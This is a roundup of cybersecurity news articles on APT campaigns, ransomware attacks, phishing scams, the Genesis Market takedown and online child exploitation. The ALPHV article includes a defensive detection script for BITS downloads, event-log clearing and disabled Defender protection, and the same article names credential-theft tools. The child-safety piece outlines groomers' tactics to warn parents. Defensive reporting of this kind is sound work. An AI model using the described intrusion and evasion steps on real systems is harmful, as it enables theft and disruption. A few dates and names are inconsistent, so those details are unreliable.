Kimsuky Hackers from North Korea Back in Action with Advanced Reconnaissance Malware

 

Kimsuky, a North Korean APT outfit, has been discovered deploying a piece of bespoke malware named RandomQuery as part of a reconnaissance and information exfiltration operation.

"Lately, Kimsuky has been consistently distributing custom malware as part of reconnaissance campaigns to enable subsequent attacks," Aleksandar Milenkoski and Tom Hegel of SentinelOne noted in a report.

According to the cybersecurity firm, the current targeted campaign is particularly aimed at information services as well as organizations supporting human rights advocates and North Korean defectors.

Kimsuky, which has been active since 2012, has demonstrated targeting patterns that correspond to North Korea's operational directives and priorities.

As SentinelOne disclosed earlier this month, the information collection missions have featured the employment of a broad assortment of malware, including another reconnaissance program named ReconShark.

The group's most recent activity cluster began on May 5, 2023, and employs a form of RandomQuery that is specially tailored to enumerate files and siphon sensitive data.

RandomQuery, along with FlowerPower and AppleSeed, is among the most widely disseminated tools in Kimsuky's arsenal, with RandomQuery acting as an information stealer and a conduit for the distribution of remote access trojans such as TutRAT and xRAT.

The attacks begin with phishing emails purporting to be from Daily NK, a famous Seoul-based online daily covering North Korean events, in order to convince potential targets to open a Microsoft Compiled HTML Help (CHM) file.

It's worth noting at this point that CHM files have also been used as a lure by ScarCruft, another North Korean nation-state actor. When the CHM file is launched, a Visual Basic Script is executed, which sends an HTTP GET request to a remote server to receive the second-stage payload, a VBScript flavor of RandomQuery.

The malware then proceeds to collect system metadata, running processes, installed apps, and files from various folders, which are all sent back to the command-and-control (C2) server.

"This campaign also demonstrates the group's consistent approach of delivering malware through CHM files," the researchers said.

"These incidents underscore the ever-changing landscape of North Korean threat groups, whose remit not only encompasses political espionage but also sabotage and financial threats."

The discoveries come only days after the AhnLab Security Emergency Response Centre (ASEC) uncovered a Kimsuky watering hole attack, which involves setting up a lookalike of a webmail system used by national policy research organizations in order to capture credentials entered by victims.

Kimsuky has also been linked to attacks that weaponize vulnerable Windows Internet Information Services (IIS) servers in order to drop the Metasploit Meterpreter post-exploitation framework, which is then used to spread Go-based proxy malware.

Industrial Espionage: Here's All You Need to Know

 

Cyberattacks are actively guarded against by all responsible firms. However, one security concern that many firms ignore is industrial espionage. Industrial espionage and cyberattacks are frequently carried out for the same reason: to steal confidential information. 

Industrial espionage, on the other hand, is carried out by a corporate competitor rather than a random hacker. Industrial espionage is the theft of confidential information from a company in order to gain a competitive edge. It can take many forms, but the most sophisticated attacks include an employee of the company being targeted. A rival may try to hire someone at the target company, or they may approach an existing employee and offer them money in exchange for information.

Competitive Intelligence vs. Industrial Espionage

Competitive intelligence and industrial espionage are not the same thing. Both methods entail gathering information about the competition. Competitive intelligence, on the other hand, is only conducted legally. A company performing competitive intelligence takes advantage of publicly available information on the internet. It does not include any kind of surveillance or unlawful conduct. Industrial espionage entails gathering any knowledge that may be profitable.

Industrial espionage targets any information that could be profitable, such as upcoming product details, financial information, client lists, and marketing strategies. Obtaining such information can provide a competitive edge by allowing a business to improve its own products, offer better deals to providers and employees, undercut prices, damage reputation, or copy and release similar marketing strategies. Client information can also be used to identify potential customers and pricing strategies, and marketing information can be used to promote similar products or compete with effective strategies.

In order to protect against industrial espionage, all businesses should take the following precautions.
  • Invest in Cybersecurity
  • Encrypt All Private Data
  • Increase Physical Security
  • Require Confidentiality Agreements
  • Prevent Insider Threats

Most businesses should protect themselves against industrial espionage. Every company has information that could be useful to its competition. There are also numerous ways it might be stolen. While insider threats are the most effective means to steal information, physical trespassing is frequently simple and effective. Cyberattacks are another formidable tool that certain competitors may use.

To protect against industrial espionage, all firms should be cautious about who they hire, keep an eye out for disgruntled employees, secure physical locations, and adopt cybersecurity measures.

FBI Obtained Detailed Database Exposing 59K+ Users of the Cybercrime Genesis Market

 

In its takedown of Genesis Market, a site famous in the cybercriminal realm for selling access to user accounts, the FBI gathered information on possibly tens of thousands of hackers. Senior FBI and Justice Department officials stated in a Wednesday briefing that law enforcement found and duplicated the backend servers for Genesis Market's main site. These servers store stolen victim passwords and session cookies, as well as information on customers of the infamous hacking site. 

According to a US official, the server copies contain information about around 59,000 individual user accounts, including usernames, passwords, email addresses, and secure messenger accounts, as well as a history of user activity.

In connection with the site's closure, the FBI and its partners have already made 119 arrests, including 24 in the United Kingdom. However, the information obtained from the server seizures could assist law enforcement in apprehending even more criminals. 

The Justice Department admits that some of the apprehended suspects are US citizens, but it is unable to provide a precise figure. US officials are also reluctant to clarify whether any Genesis Market leaders had been arrested. The Treasury Department, on the other hand, stated that the hacker site "is believed to be located in Russia," a country that has traditionally refused to extradite criminal suspects to the United States. 

As a result, the primary operators of Genesis Market are likely to have escaped arrest and will attempt to resume their operations. The FBI has taken down the marketplace's primary domain. The dark web onion site for Genesis, on the other hand, is still active.

For the time being, US officials have only stated that they are focusing on capturing the site's leaders and putting pressure on the cybercriminal world. The takedown comes just weeks after authorities shut down another prominent hacker forum, BreachForums. In doing so, the FBI said that it had obtained a backend database for BreachForums, which is likely to contain information on several hackers.

“Each takedown is yet another blow to the cybercrime ecosystem,” US Deputy Attorney General Lisa Monaco said in today’s announcement.

ALPHV Ransomware Affiliate Targets Vulnerable Backup Installations to Gain Initial Access

 

An ALPHV/BlackCat ransomware affiliate was spotted gaining initial access to the target network by abusing three flaws in the Veritas Backup Exec product. The ALPHV ransomware operation first appeared in December 2021, and it is thought to be controlled by former members of the Darkside and Blackmatter programs, which shut down abruptly to avoid law enforcement scrutiny.

Mandiant identifies the ALPHV affiliate as 'UNC4466,' noting that the method differs from the conventional breach, which depends on stolen credentials. Mandiant reports that on October 22, 2022, it spotted the first occurrences of Veritas flaw exploitation in the field. UNC4466 focuses on the following high-severity flaws:
  • CVE-2021-27876: Arbitrary file access flaw caused by an error in the SHA authentication scheme, allowing a remote attacker to gain unauthorized access to vulnerable endpoints. (CVSS score: 8.1)
  • CVE-2021-27877: Remote unauthorized access and privileged command execution to the BE Agent via SHA authentication. (CVSS score: 8.2)
  • CVE-2021-27878: Arbitrary command execution flaw resulting from an error in the SHA authentication scheme, allowing a remote attacker to gain unauthorized access to vulnerable endpoints. (CVSS score: 8.8)

The Veritas Backup software is affected by all three issues. They were disclosed by the vendor in March 2021, and a remedy was published with version 21.2. Despite the fact that it has been over two years, many endpoints remain vulnerable since they have not been updated to a safe version.

According to Mandiant, a commercial scanning service discovered more than 8,500 IP addresses on the public web advertising the "Symantec/Veritas Backup Exec ndmp" service on the default port 10000 as well as ports 9000 and 10001.

"While this search result does not directly identify vulnerable systems, as the application versions were not identifiable, it demonstrates the prevalence of Internet exposed instances that could potentially be probed by attackers" - Mandiant

On September 23, 2022, a Metasploit module to exploit these flaws was made available to the public. The code enables attackers to establish a session and interact with the compromised endpoints. According to Mandiant, UNC4466 began using the specific module a month after it was released.

Specifics of the attack

According to Mandiant's findings, UNC4466 compromises an internet-exposed Windows server running Veritas Backup Exec by utilizing the publicly accessible Metasploit module and gains persistent access to the host.

Following the first compromise, the threat actor gathered information on the victim's environment using the Advanced IP Scanner and ADRecon utilities. Next, they downloaded more tools on the host like LAZAGNE, LIGOLO, WINSW, RCLONE, and ultimately the ALPHV ransomware encryptor through the Background Intelligent Transfer Service (BITS).

To interact with the command-and-control (C2) server, the threat actor employed SOCKS5 tunneling. According to the researchers, UNC4466 used BITS transfers to download SOCKS5 tunneling tools before deploying the ransomware payload by adding immediate tasks to the default domain policy, disabling the security software, and executing encryptors.

UNC4466 uses Mimikatz, LaZagne, and Nanodump to steal valid user credentials in order to escalate privileges. Finally, the threat actor avoids discovery by erasing event logs and turning off Microsoft Defender's real-time monitoring capability.

Mandiant's report gives recommendations for defenders to take in order to detect and prevent UNC4466 attacks before the ALPHV payload is executed on their systems.
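As an added illustration (not taken from Mandiant's report or the original post), the sketch below correlates three of the behaviours described above on a single host: BITS downloads from unexpected sources, cleared event logs, and Microsoft Defender real-time protection being disabled. The event dictionary layout, the allowlist and the 24-hour window are assumptions, and the sample events are constructed.

```python
from datetime import datetime, timedelta
from urllib.parse import urlparse

# Standard Windows (channel, event ID) pairs mapped to a behaviour label.
RULES = {
    # BITS client: a transfer job was started for a URL
    ("Microsoft-Windows-Bits-Client/Operational", 59): "bits_download",
    # Security audit log cleared
    ("Security", 1102): "log_cleared",
    # Another event log cleared (recorded in the System log)
    ("System", 104): "log_cleared",
    # Microsoft Defender real-time protection disabled
    ("Microsoft-Windows-Windows Defender/Operational", 5001): "defender_rtp_disabled",
}

# Assumption: sources from which BITS transfers are expected in this environment.
BITS_ALLOWLIST = {"download.windowsupdate.com"}

# Assumption: behaviours seen within 24 hours of each other are treated as related.
WINDOW = timedelta(hours=24)


def classify(event):
    """Return the behaviour label for an event, or None if it is not of interest."""
    label = RULES.get((event["channel"], event["event_id"]))
    if label == "bits_download":
        host = (urlparse(event.get("url", "")).hostname or "").lower()
        allowed = host in BITS_ALLOWLIST or any(
            host.endswith("." + domain) for domain in BITS_ALLOWLIST
        )
        if allowed:
            return None  # expected BITS traffic, ignore
    return label


def correlate(events, window=WINDOW, min_behaviours=2):
    """Return {host: [behaviours]} for hosts showing at least `min_behaviours`
    distinct behaviours inside one sliding time window."""
    per_host = {}
    for ev in events:
        label = classify(ev)
        if label:
            when = datetime.fromisoformat(ev["time"])
            per_host.setdefault(ev["host"], []).append((when, label))

    alerts = {}
    for host, hits in per_host.items():
        hits.sort()
        best = set()
        for i, (start, _) in enumerate(hits):
            seen = {lbl for t, lbl in hits[i:] if t - start <= window}
            if len(seen) > len(best):
                best = seen
        if len(best) >= min_behaviours:
            alerts[host] = sorted(best)
    return alerts


# Constructed sample events (hypothetical hosts; 203.0.113.0/24 is a documentation range).
SAMPLE_EVENTS = [
    {"host": "BKP01", "time": "2023-04-03T01:12:00",
     "channel": "Microsoft-Windows-Bits-Client/Operational", "event_id": 59,
     "url": "http://203.0.113.10/t.zip"},
    {"host": "BKP01", "time": "2023-04-03T02:40:00",
     "channel": "Microsoft-Windows-Windows Defender/Operational", "event_id": 5001},
    {"host": "BKP01", "time": "2023-04-03T02:55:00",
     "channel": "Security", "event_id": 1102},
    # Allowlisted BITS source plus one log clear: a single behaviour, no alert.
    {"host": "WS07", "time": "2023-04-03T09:00:00",
     "channel": "Microsoft-Windows-Bits-Client/Operational", "event_id": 59,
     "url": "http://au.download.windowsupdate.com/c/update.cab"},
    {"host": "WS07", "time": "2023-04-03T09:30:00",
     "channel": "Security", "event_id": 1102},
    # Two behaviours, but three days apart: outside the window, no alert.
    {"host": "FS02", "time": "2023-04-01T08:00:00",
     "channel": "Microsoft-Windows-Windows Defender/Operational", "event_id": 5001},
    {"host": "FS02", "time": "2023-04-04T08:00:00",
     "channel": "System", "event_id": 104},
]

if __name__ == "__main__":
    for host, behaviours in correlate(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(behaviours)}")
```
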

To Safeguard Children from Exploitation, Parents Should Reconsider Approach to Online Behaviour

 

Raising children in the digital age is becoming particularly complex. Many young people are increasingly reliant on screens for social interaction. They experiment with new media sharing platforms such as TikTok, Snapchat, and BeReal, but without necessarily considering long-term consequences.

This is normal because children's prefrontal cortex, the part of the brain responsible for reasoning, decision-making, and impulse control, is still underdeveloped. Parents who are responsible for anticipating the outcomes of digital interactions are overwhelmed. Many parents may lack the digital literacy to guide their children through today's plethora of social media platforms, messaging apps, and other online platforms. This situation may expose children to online sexual exploitation. 

We collected data from a diverse group of experts in the United States and the United Kingdom for our study. Interviews were conducted with internet safety non-profits, safeguarding teams, cybercrime police officers, digital forensics staff, and intelligence directors. The ability to share explicit content online is a major reason for the rapid escalation of online child sexual exploitation. The research unveiled four distinct stages used by perpetrators.

In Stage 1, perpetrators use various technological tools and networks to initiate contact with potential victims, such as social media, messaging apps, games, and online forums. They frequently create false identities by using fake images to create convincing digital personas through which they approach children, such as posing as a "new kid on the block" looking for new friends.

In Stage 2, perpetrators use tactics such as impersonating a similar-aged child to gain the trust of potential victims. This can occur over a long period of time. In one case we investigated, a 12-year-old boy in Lee County, North Carolina, received 1,200 messages from the same perpetrator over the course of two years. Offenders may send their own explicit images during this stage to reduce a victim's suspicion.

In Stage 3, the perpetrators resort to online extortion. They modify innocent photos or use photographs provided by victims to make them appear sexual or pornographic. Perpetrators then send these images to their victims in order to keep them in a state of humiliation. When perpetrators threaten to share these humiliating images with the victim's friends, teachers, or family unless their victims send more explicit photos or videos, the situation escalates.

At this point, many extortion techniques and direct threats are being used. It's difficult to imagine the psychological strain this can put on children. Before seeking help, a 12-year-old girl uploaded 660 sexually explicit images of herself to a cloud-based storage account controlled by a 25-year-old perpetrator.

In Stage 4, perpetrators begin selling these images on peer-to-peer networks, the dark web, and even child pornographic websites.

Defending against online exploitation

Parents can help prevent exploitation by avoiding common mistakes. By sharing these, parents, policymakers, school boards, and even children will reconsider their approach to online behavior.
 
1. "That will never happen to us!" Many victims and their families are victims of optimism bias, believing that bad things will never happen to them. Online crimes, on the other hand, can affect anyone. Unfortunately, these occurrences are more common than most people realise. No family is immune to the dangers of the online world.

2. "Everyone's doing it!" It is now common for parents to overshare pictures of their children on social media. Many parents find it difficult to resist the pressure or temptation to post photos of their children on social media. These photographs are frequently edited and distorted to appear pornographic. Everyone in the family must resist the urge to overshare photos on social media.

3. "It doesn't bother my kids!" Many children today have a digital presence that their parents initiated and maintain without their consent. This disregard for children's privacy not only undermines their autonomy, but it can also have long-term consequences for their self-esteem, personal and professional future, and parent-child relationship.

4. "We are unable to keep up with their technology!" When they can't keep up with their children, many parents feel overwhelmed and intimidated. As technology continues to play an important role in children's lives, parents' digital literacy must be improved through online resources and schools. Parents must seek and receive assistance in understanding the technology that their children use.

5. "They're just online chatting with friends!" Parents may be very involved and interested in who their children talk to on the way home from school or at friends' houses, but they may not be as aware of who their children talk to online. Just as they are interested in their child's real-world interactions, the benefits and risks of online behavior must be an important and frequent topic of discussion.

Online child sexual exploitation is a serious and multifaceted problem that requires our undivided attention. We can only hope to prevent children from becoming victims of these crimes if we carefully consider these critical concerns.

McAfee Invoice Fraud Email Pretending to be a Subscription Renewal Receipt

 

Readers should beware of clicking links in a McAfee invoice scam email that claims to be a "confirmation receipt" for the subscription renewal of the company's products. This email does not come from McAfee Corp. Email scams that use the names of antivirus and security companies are probably as old as the internet, but this particular one for McAfee apparently tried to combine two different threats into one: malware and phishing. 

Snopes reviewed one of the McAfee invoice scam emails. The subject line read, "Confirmation Receipt ID.6030955553." The following message came from an email address associated with uilsducoach.com, not the official company website mcafee.com:
  • Reassure your McAfee is up to date.
  • Check now as it may have ended.
  • Your subscription of McAfee for your computer may ended soon.
  • After the ending date has passed your computer will become susceptible to many different virus and threats.
  • Your PC might be unprotected, it can be exposed to viruses and other malware...
  • You are eligible for discount: -70%*

A scan of the links with a malicious-URL scanner revealed that the email was "hosting malware" and contained a "phishing link."

The link started on an Amazon Web Services page. Vestingsupper.com was one of the redirects. More information was not available at the time this story was published. McAfee has previously published several articles about these types of scams, including details on what to do if you believe you've been a victim of one.

It's recommended, "if you accidentally enter data in a webpage linked to a suspicious email, perform a full malware scan on your device. Once the scan is complete, backup all of your files and change your passwords. Even if you only provided a phishing scammer with the data from one account, you may have also opened the door to other personal data, so it's important to change all the passwords you use online in the wake of a suspected phishing attack."

Malwarebytes and Norton are two other companies that are recommended for malware scans. If readers provided financial information to scammers, such as a credit card number, we recommend contacting that financial institution right away to notify them of the problem. To ensure that scammers do not use the compromised card in the future, a new credit card with a new number may need to be mailed to you in some cases.

The United States has Released its National Cybersecurity Strategy: Here's What you Need to Know

 


The US government is taking steps to enhance the country's cybersecurity capabilities and improve its overall technology governance strategy. President Joe Biden recently unveiled a new National Cybersecurity Strategy aimed at securing cyberspace and building a resilient digital ecosystem that is easier to defend than to attack. 

"When we pick up our smartphones to keep in touch with loved ones, log on to social media to share our ideas with one another, or connect to the internet to run a business or take care of any of our basic needs, we need to be able to trust that the underlying digital ecosystem is safe, reliable and secure," Biden wrote in the framework's preface.

The strategy is part of a broader effort by the Biden administration to reinforce cyber and technology governance, which includes increasing accountability for tech firms, strengthening privacy protections, and ensuring fair competition online.

Why does the United States require a National Cybersecurity Strategy?

The world is becoming more complex, and cyber threats are becoming more sophisticated, with ransomware attacks causing millions of dollars in economic losses in the United States. According to IBM, the average cost of a ransomware attack in 2022 will be more than $4.5 million. The greatest threats we face are interconnected, raising the prospect of a "polycrisis," in which the overall combined impact of these events exceeds their individual impact.

This is also true of technological risks, where attacks on critical information infrastructure, for example, could have disastrous consequences for public infrastructure and health, or where rising geopolitical tensions increase the risk of cyberattacks.

Cybercrime and cyber insecurity were ranked eighth in terms of severity of impact by risk experts polled for the World Economic Forum's Global Risks Report, both in the short term (the next two years) and over the next decade. According to Google data, state-sponsored cyberattacks targeting NATO users increased by 300% in 2022 compared to 2020. With cyberattacks on the rise, experts at the World Economic Forum's Annual Meeting at Davos predicted that 2023 would be a "busy year" for cyberspace with a "gathering cyber storm".

“This is a global threat, and it calls for a global response and enhanced and coordinated action,” Jürgen Stock, Secretary-General of the International Criminal Police Organization (INTERPOL), said at Davos.

According to the Forum's Global Cybersecurity Outlook 2023, 93% of cybersecurity experts and 86% of business leaders believe global instability will have a negative impact on their ability to ensure cybersecurity in the future.

As Biden notes, "Cybersecurity is essential to the basic functioning of our economy, the operation of our critical infrastructure, the strength of our democracy and democratic institutions, the privacy of our data and communications, and our national defense.

"We must ensure the internet remains open, free, global, interoperable, reliable, and secure – anchored in universal values that respect human rights and fundamental freedoms."

What are the National Security Strategy's five pillars?

Because the COVID-19 pandemic has accelerated the world's digital transformation, we rely on connected devices and digital technology to do more than ever before, putting our lives and livelihoods at greater risk from cyber threats.

The US National Security Strategy recognizes the need to rebalance the burden of responsibility for cybersecurity away from small businesses and individuals and onto the public and private organizations best placed to defend cyberspace through "robust collaboration".

It also aims to strengthen cyberspace resilience by balancing the need to address immediate threats with incentivizing investment in the digital ecosystem's secure, long-term future. Each of the five pillars it establishes is divided into strategic objectives, but here's a quick rundown of what they entail:

1. Defend critical infrastructure
2. Disrupt and dismantle threat actors
3. Shape market forces to drive security and resilience
4. Invest in a resilient future
5. Forge international partnerships to pursue shared goals


The LockBit Ransomware Takes Responsibility for the Royal Mail Cyberattack

 

The LockBit ransomware operation has asserted responsibility for the cyberattack on Royal Mail, the UK's leading mail delivery service, which forced the company to stop its international shipping services due to "severe service disruption." 

This comes after LockBitSupp, the public-facing representative of the ransomware group, earlier told BleepingComputer that the LockBit cybercrime group did not target Royal Mail. They instead blamed the attack on other threat actors who used the LockBit 3.0 ransomware builder, which was leaked on Twitter in September 2022. LockBitSupp did not clarify why printed Royal Mail ransom notes seen by BleepingComputer included links to LockBit's Tor negotiation and data leak sites rather than those operated by a different threat actor.

However, LockBitSupp validated LockBit's involvement in the attack in a post on a Russian-language hacking forum after discovering that one of their affiliates deployed the gang's ransomware payloads on Royal Mail's systems.

The representative of the ransomware gang also stated that they would only provide a decryptor and delete data stolen from Royal Mail's network after a ransom was paid. The entry for the Royal Mail attack on LockBit's data leak site currently states that stolen data will be published online on Thursday, February 9, at 03:42 AM UTC.

The attack was termed a "cyber incident"

On January 10, Royal Mail discovered the attack and hired outside forensic experts to assist with the investigation.

A Royal Mail spokesperson told BleepingComputer on January 11 when we reached out for more details, "Incident was detected yesterday, UK/ domestic mail remains unaffected."

"We're experiencing disruption to our international export services and are temporarily unable to despatch items to overseas destinations. Please do not post any export items while we work to resolve the issue. Sorry for any disruption this may cause," the company tweeted.

The incident was also reported to UK security agencies, and the company is investigating it alongside the National Crime Agency and the UK National Cyber Security Centre (NCSC).

However, Royal Mail has yet to acknowledge that it is the victim of a ransomware attack, which could result in a data breach because LockBit ransomware operators are known for stealing data and leaking it online if their ransom demands are not met.

For the time being, the company is still referring to the attack as a "cyber incident" and claims to have restored some of the services that were impacted by the attack. The incident last month follows a November 2022 outage that caused the Royal Mail's tracking services to be unavailable for more than 24 hours.

The Royal Mail's recurring IT problems come at a time when its mailing services are already under strain due to planned national strikes and ongoing talks with the Communication Workers Union.     

Trojanized Windows 10 Installer Utilized in Cyberattacks Against Ukrainian Government Entities

 

Ukraine's government has been compromised as part of a new campaign that used trojanized versions of Windows 10 installer files to conduct post-exploitation activities. The malicious ISO files were distributed via Ukrainian and Russian-language Torrent websites, according to Mandiant, which discovered the "socially engineered supply chain" attack around mid-July 2022. The threat cluster is identified as UNC4166. 

"Upon installation of the compromised software, the malware gathers information on the compromised system and exfiltrates it," the cybersecurity company said in a technical deep dive published Thursday.

Even though the origin of the adversarial collective is unknown, the disruptions are said to have targeted organisations that had previously been victims of disruptive wiper attacks blamed on APT28, a Russian state-sponsored actor. According to the Google-owned threat intelligence firm, the ISO file was designed to disable telemetry data transmission from the infected computer to Microsoft, install PowerShell backdoors, and block automatic updates and licence verification.

The main objective of the operation appears to have been data gathering, with additional implants deployed to the machines only after an initial reconnaissance of the vulnerable environment to determine if it contained valuable intelligence.

Stowaway, an open source proxy tool, Cobalt Strike Beacon, and SPAREPART, a lightweight backdoor written in C that enables the threat actor to execute commands, harvest data, capture keystrokes and screenshots, and export the data to a remote server, were among them.

The malicious actor attempted to download the TOR anonymity browser onto the victim's device in some cases. While the precise reason for this action is unknown, it is suspected that it served as an alternative exfiltration route.

SPAREPART, as the name suggests, is considered to be redundant malware that is used to uphold remote access to the system if the other methods fail. It also has the same functionality as the PowerShell backdoors that were dropped early in the attack chain.

"The use of trojanized ISOs is novel in espionage operations and included anti-detection capabilities indicates that the actors behind this activity are security conscious and patient, as the operation would have required a significant time and resources to develop and wait for the ISO to be installed on a network of interest," Mandiant stated.

The findings come as Check Point and Positive Technologies revealed attacks on the government sector in Russia, Belarus, Azerbaijan, Turkey, and Slovenia by an espionage group known as Cloud Atlas as part of a persistent campaign.

The hacking group, which has been active since 2014, has a history of targeting entities in Eastern Europe and Central Asia. However, the outbreak of the Russo-Ukrainian war earlier this month has shifted its focus to organisations in Russia, Belarus, and Transnistria.

"The actors are also maintaining their focus on the Russian-annexed Crimean Peninsula, Lugansk, and Donetsk regions," Check Point said in an analysis last week.

The adversary's attack chains typically utilise phishing emails with bait attachments as the initial intrusion vector, leading to the delivery of a malicious payload via an intricate multi-stage sequence. The malware then contacts an actor-controlled C2 server to obtain additional backdoors capable of stealing files with specific extensions from the compromised endpoints.

Check Point's observations, on the other hand, culminate in a PowerShell-based backdoor known as PowerShower, which was first discovered by Palo Alto Networks Unit 42 in November 2018. Some of these intrusions in June 2022 were also successful, allowing the threat actor to achieve full network access and use tools such as Chocolatey, AnyDesk, and PuTTY.

"With the escalation of the conflict between Russia and Ukraine, their focus for the past year has been on Russia and Belarus and their diplomatic, government, energy and technology sectors, and on the annexed regions of Ukraine," Check Point added.

Cloud Atlas, also known as Clean Ursa, Inception, Oxygen, and Red October, is still unidentified, joining the ranks of other APTs such as TajMahal, DarkUniverse, and Metador. The group's name derives from its reliance on cloud services such as CloudMe and OpenDrive to host malware.

Absence of Cybersecurity Expertise Affects Public-Safety Organizations

 

Cybersecurity threats have become pervasive for police departments, first responders, and other public-safety organizations, with 93% of organizations reporting a cybersecurity incident in the previous year, according to a report published on December 8 by cloud platform provider Mark43, which was based on a survey of 343 first responders.

Based on the 2023 U.S. Public Safety Trends Report, 76% of first responders are concerned about the vulnerability of their IT systems to ransomware attacks and data breaches. Simultaneously, the vast majority of first responders must deal with outdated technology and disconnected systems, with 68% of public-safety officers required to file paperwork from the office rather than in the field, and 67% of first responders experiencing issues with inefficient technology, according to the report.

"These agencies in many cases do not have a dedicated security staff who can worry about these issues all day, ensuring that data is backed up and running vulnerability scans," he says. "To the [cybersecurity] community, these are table stakes — you need to be doing patching, you need to be doing vulnerability scanning ... but these agencies are realizing that they cannot protect themselves from these risks on their own."

While technology can help fix many of the problems that presently afflict first responders, most state and local agencies lack the technical expertise to protect such technology from threats, as per Larry Zorio, chief information security officer for Mark43, which provides information systems for law enforcement and first responder agencies.

In 2021, the FBI warned that the Conti cybercriminal group had targeted at least 16 healthcare and first responder networks with ransomware. A ransomware attack disrupted 911 service in Suffolk County, New York in September 2022.

First Responders are being targeted

According to the FBI's 2021 advisory, these attacks pose additional risks to citizens.

"Cyberattacks targeting networks used by emergency services personnel can delay access to real-time digital information, increasing safety risks to first responders and could endanger the public who rely on calls for service to not be delayed," the advisory stated. "Loss of access to law enforcement networks may impede investigative capabilities and create prosecution challenges."

Ransomware attacks, in general, are expected to continue at the same rate, according to information technologists. According to a study commissioned by Ransomware.org, the vast majority of IT professionals (84%) see ransomware as a significant threat to businesses. Furthermore, 41% of IT professionals believe their company will be a target this year, while 43% believe the threat will remain the same.

The cybersecurity concerns of first responders are not unwarranted. In 2019 and 2020, ransomware groups intensified their attacks on state, local, tribal, and territorial (SLTT) government agencies. In 2019, for example, a coordinated ransomware attack on 22 town agencies and local government organizations disrupted citizen services. Ransomware attacks on local school systems impacted at least 753,000 students in 2019 and 1.2 million in 2020, according to the National Center for Education Statistics.

For first responders, cybersecurity threats must be balanced against the slow adoption of technology that could improve the efficiency of their jobs and operations. While the majority of first responders believe that an integrated reporting system would streamline operations, according to the Mark43 survey, only a quarter of first responder organizations (27%) have moved to the cloud — the other two-thirds have not.

According to the Mark43 survey, compliance and data transparency are also major concerns for first responders, with 86% of respondents requesting improved crime reporting and two-thirds requesting more public transparency.

The agencies must prioritize roles in technology, data management, and cybersecurity. Instead, cybersecurity is frequently delegated to untrained IT personnel within the department or to officers nearing retirement, according to Zorio.

"I don't feel that officers, who are trying to serve our communities, the fact that they are worried about that every day is definitely a concern," he says. "The industry in general needs to help them where we can, because it is not their job to worry about cybersecurity."

Based on the survey, cybersecurity issues include both malicious cybercriminal attacks and availability issues caused by attacks.

Vanuatu Officials Resort to Phone Books and Typewriters, One Month After Cyberattack

 

One month after a cyber-attack brought down Vanuatu's government servers and websites, frustrated officials were still using private Gmail accounts, personal laptops, pen and paper, and typewriters to run the government of Prime Minister Ishmael Kalsakau, who took office just a few days after the crash.

Malware attacks on state networks have slowed communication and coordination in the Pacific island nation of 314,000 people spread across 80 islands. To find government phone numbers, people turned to the online Yellow Pages or the hard copy phone directory. Some offices were operating solely through their Facebook and Twitter pages.

According to a financial analyst who works closely with the ministry's cybersecurity teams, the problems began about a month ago, when suspicious phishing activity was first detected in emails to the Ministry of Finance.

Almost all government email and website archives were destroyed by malware. Many departments were still storing data on local computer drives rather than web servers or the cloud. There has been no official word on whether or not the hackers demanded a ransom.

“It is taking longer for payments [from the Ministry of Finance] to get out, but … we are always on Vanuatu time anyway,” stated the financial analyst.

Government departments have struggled to stay connected, frustrating officials, with spontaneous solutions for communication between agencies and departments being implemented. Many government offices on the outer islands are experiencing significant service delays.

“It was chaos during the first few days but the entire government made alternative Gmail accounts or used their private emails. We are all using telephones and mobile phones for communication. But we are resilient in Vanuatu as a small country and can manage this,” said Olivia Finau, a communications officer in the Ministry of Climate Change. “Our department is communicating with the public more now with Facebook and Twitter, and we are actually getting more followers.”

The attack did not cause any disruptions to civilian infrastructures, such as airline or hotel websites. The majority of tourism and business has continued as usual through the busy Christmas and New Year's seasons.

According to the analyst, the current system can be improved by upgrading software and storing files in the cloud for management. However, local officials lack the necessary expertise and "require outside assistance."

The government had previously reported that the attack took place on November 5, but a computer technician at the Office of the Government's Chief Information Officer and a foreign diplomat confirmed to the Guardian that the crash took place on October 30.

In the early days of the crisis, some Vanuatu authorities blamed the problem on bad weather, which damaged the internet infrastructure.

However, the diplomat said: “We noticed there was a problem right away … our team recognized this as having the hallmarks of a cyber-attack, and not being caused by weather.”

Internal communication breakdowns in the days following the attack exacerbated matters. On November 4, Prime Minister Kalsakau formally took office, and on November 5, the government formally acknowledged the problem. 

The Australian government has offered assistance. "We sent a team in to assist with that disgraceful cyber-attack and response, and we are working through the process of bringing the government IT systems back up to speed," Pat Conroy, Australia's minister for international development and the Pacific, told Vanuatu Daily.

Cyber-attacks have wreaked havoc around the world in recent years, and Vanuatu's attack will serve as a warning to small Pacific nations with even weaker cybersecurity than Port Vila. Requests for comment were not returned by the Vanuatu Office of the Government Chief Information Officer (OGCIO).

Microsoft Announces the Microsoft Supply Chain Platform

 

Software as a Service (SaaS) applications from Microsoft that combine artificial intelligence, collaboration, low-code, security, and supply chain management have been launched as the Microsoft Supply Chain Platform.

Dynamics 365, Microsoft Teams, Power BI, Power Automate, Power Apps, Azure Machine Learning, Azure Synapse Analytics, Azure IoT, the Microsoft Intelligent Data Platform, Azure Active Directory, Defender for IoT and Microsoft Security Services for Enterprise are among the Microsoft applications and platforms in this group.
 
Microsoft's PowerApps low-code development platform is intended to let users create a connected supply chain. It enables supply chain information, supply and demand insights, performance tracking, supplier management, real-time collaboration, and demand management to lessen risk.

Additionally, it addresses order tracking and traceability, pricing management, warehouse management, and inventory optimization. According to Microsoft, businesses are suffering from an overabundance of petabytes of data that are dispersed among legacy systems, enterprise resource planning (ERP) software, and custom solutions, giving them a fragmented view of their supply chain.

The Microsoft Supply Chain Center preview has also been released by Microsoft. It promises to track global events that may impact a customer's supply chain, coordinate actions across a supply chain, and use AI to lessen supply and demand mismatches. According to Microsoft, this constitutes the foundation of the supply chain platform.

"Although supply chain disruption is not new, its complexity and the rate of change are outpacing organizations' ability to address issues at a global scale. Many solutions today are narrowly focused on supply chain execution and management and are not ready to support this new reality," said Charles Lamanna, corporate vice president of Microsoft Business Applications and Platform, in a press release.

"Businesses are dealing with petabytes of data spread across legacy systems, ERP, supply chain management and point solutions, resulting in a fragmented view of the supply chain," Lamanna stated. 

"Supply chain agility and resilience are directly tied to how well organizations connect and orchestrate their data across all relevant systems. The Microsoft Supply Chain Platform and Supply Chain Center enable organizations to make the most of their existing investments to gain insights and act quickly." 

